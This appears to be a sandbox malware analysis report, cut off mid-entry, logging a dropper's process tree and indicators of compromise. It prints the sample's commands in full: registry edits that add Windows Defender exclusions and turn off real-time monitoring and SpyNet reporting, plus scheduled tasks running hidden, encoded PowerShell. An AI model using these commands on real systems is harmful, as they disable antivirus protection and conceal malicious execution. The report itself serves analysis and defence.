eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	kgzJbHG.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEkgzJbHG.exe

pid	process
1336	powershell.EXE
1336	powershell.EXE
1336	powershell.EXE
700	powershell.EXE
700	powershell.EXE
700	powershell.EXE
1608	powershell.EXE
1608	powershell.EXE
1608	powershell.EXE
1372	powershell.EXE
1372	powershell.EXE
1372	powershell.EXE
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe
1564	kgzJbHG.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

description	pid	process
Token: SeDebugPrivilege	1336	powershell.EXE
Token: SeDebugPrivilege	700	powershell.EXE
Token: SeDebugPrivilege	1608	powershell.EXE
Token: SeDebugPrivilege	1372	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exe

description	pid	process	target process
PID 1324 wrote to memory of 828	1324	file.exe	Install.exe
PID 1324 wrote to memory of 828	1324	file.exe	Install.exe
PID 1324 wrote to memory of 828	1324	file.exe	Install.exe
PID 1324 wrote to memory of 828	1324	file.exe	Install.exe
PID 1324 wrote to memory of 828	1324	file.exe	Install.exe
PID 1324 wrote to memory of 828	1324	file.exe	Install.exe
PID 1324 wrote to memory of 828	1324	file.exe	Install.exe
PID 828 wrote to memory of 668	828	Install.exe	Install.exe
PID 828 wrote to memory of 668	828	Install.exe	Install.exe
PID 828 wrote to memory of 668	828	Install.exe	Install.exe
PID 828 wrote to memory of 668	828	Install.exe	Install.exe
PID 828 wrote to memory of 668	828	Install.exe	Install.exe
PID 828 wrote to memory of 668	828	Install.exe	Install.exe
PID 828 wrote to memory of 668	828	Install.exe	Install.exe
PID 668 wrote to memory of 616	668	Install.exe	forfiles.exe
PID 668 wrote to memory of 616	668	Install.exe	forfiles.exe
PID 668 wrote to memory of 616	668	Install.exe	forfiles.exe
PID 668 wrote to memory of 616	668	Install.exe	forfiles.exe
PID 668 wrote to memory of 616	668	Install.exe	forfiles.exe
PID 668 wrote to memory of 616	668	Install.exe	forfiles.exe
PID 668 wrote to memory of 616	668	Install.exe	forfiles.exe
PID 668 wrote to memory of 2028	668	Install.exe	forfiles.exe
PID 668 wrote to memory of 2028	668	Install.exe	forfiles.exe
PID 668 wrote to memory of 2028	668	Install.exe	forfiles.exe
PID 668 wrote to memory of 2028	668	Install.exe	forfiles.exe
PID 668 wrote to memory of 2028	668	Install.exe	forfiles.exe
PID 668 wrote to memory of 2028	668	Install.exe	forfiles.exe
PID 668 wrote to memory of 2028	668	Install.exe	forfiles.exe
PID 616 wrote to memory of 1580	616	forfiles.exe	cmd.exe
PID 616 wrote to memory of 1580	616	forfiles.exe	cmd.exe
PID 616 wrote to memory of 1580	616	forfiles.exe	cmd.exe
PID 616 wrote to memory of 1580	616	forfiles.exe	cmd.exe
PID 616 wrote to memory of 1580	616	forfiles.exe	cmd.exe
PID 616 wrote to memory of 1580	616	forfiles.exe	cmd.exe
PID 616 wrote to memory of 1580	616	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 700	2028	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 700	2028	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 700	2028	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 700	2028	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 700	2028	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 700	2028	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 700	2028	forfiles.exe	cmd.exe
PID 1580 wrote to memory of 1608	1580	cmd.exe	reg.exe
PID 1580 wrote to memory of 1608	1580	cmd.exe	reg.exe
PID 1580 wrote to memory of 1608	1580	cmd.exe	reg.exe
PID 1580 wrote to memory of 1608	1580	cmd.exe	reg.exe
PID 1580 wrote to memory of 1608	1580	cmd.exe	reg.exe
PID 1580 wrote to memory of 1608	1580	cmd.exe	reg.exe
PID 1580 wrote to memory of 1608	1580	cmd.exe	reg.exe
PID 700 wrote to memory of 948	700	cmd.exe	reg.exe
PID 700 wrote to memory of 948	700	cmd.exe	reg.exe
PID 700 wrote to memory of 948	700	cmd.exe	reg.exe
PID 700 wrote to memory of 948	700	cmd.exe	reg.exe
PID 700 wrote to memory of 948	700	cmd.exe	reg.exe
PID 700 wrote to memory of 948	700	cmd.exe	reg.exe
PID 700 wrote to memory of 948	700	cmd.exe	reg.exe
PID 1580 wrote to memory of 1092	1580	cmd.exe	reg.exe
PID 1580 wrote to memory of 1092	1580	cmd.exe	reg.exe
PID 1580 wrote to memory of 1092	1580	cmd.exe	reg.exe
PID 1580 wrote to memory of 1092	1580	cmd.exe	reg.exe
PID 1580 wrote to memory of 1092	1580	cmd.exe	reg.exe
PID 1580 wrote to memory of 1092	1580	cmd.exe	reg.exe
PID 1580 wrote to memory of 1092	1580	cmd.exe	reg.exe
PID 700 wrote to memory of 1528	700	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1324

C:\Users\Admin\AppData\Local\Temp\7zS19B9.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:828

C:\Users\Admin\AppData\Local\Temp\7zS27EC.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:616

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1580

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1608

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:1092

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:700

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:948

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:1528

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gFXFQUHmN" /SC once /ST 01:07:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:1632

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gFXFQUHmN"
4⤵
PID:1996

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gFXFQUHmN"
4⤵
PID:900

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "beNJzxXkYGhzSCmkZn" /SC once /ST 12:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\vHonfjD.exe\" Qf /site_id 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1820

C:\Windows\system32\taskeng.exe
taskeng.exe {7ACECF2B-5E99-4926-9DC9-2FDE1AB0D900} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
PID:1888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1336

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1608

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1816

C:\Windows\system32\taskeng.exe
taskeng.exe {C466287E-198D-405E-AF29-33E086459440} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1784

C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\vHonfjD.exe
C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\vHonfjD.exe Qf /site_id 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:972

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gQgURxNJi" /SC once /ST 10:38:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:948

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gQgURxNJi"
3⤵
PID:616

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gQgURxNJi"
3⤵
PID:1812

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:1212

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1644

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:1572

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1032

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gPonqqLIa" /SC once /ST 04:48:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:2036

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gPonqqLIa"
3⤵
PID:328

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gPonqqLIa"
3⤵
PID:700

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1668

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1272

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:64
3⤵
PID:656

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:680

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1040

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1816

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:64
3⤵
PID:936

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1468

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\MNBTbrbBidagOXts\TeybQaMN\knqdnrqhMOWBHYXe.wsf"
3⤵
PID:1476

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\MNBTbrbBidagOXts\TeybQaMN\knqdnrqhMOWBHYXe.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:1460

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1304

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1544

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1172

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1712

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:240

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RIEoyfpemMjlUPVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RIEoyfpemMjlUPVB" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:656

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1040

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1472

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2040

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:992

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1672

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1172

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1764

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:544

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RIEoyfpemMjlUPVB" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RIEoyfpemMjlUPVB" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:240

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1368

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1652

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1068

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1360

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "glQqMbXgc" /SC once /ST 09:05:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1528

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "glQqMbXgc"
3⤵
PID:324

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "glQqMbXgc"
3⤵
PID:1728

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
3⤵
PID:1256

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
4⤵
PID:1984

C:\Windows\SysWOW64\cmd.exe
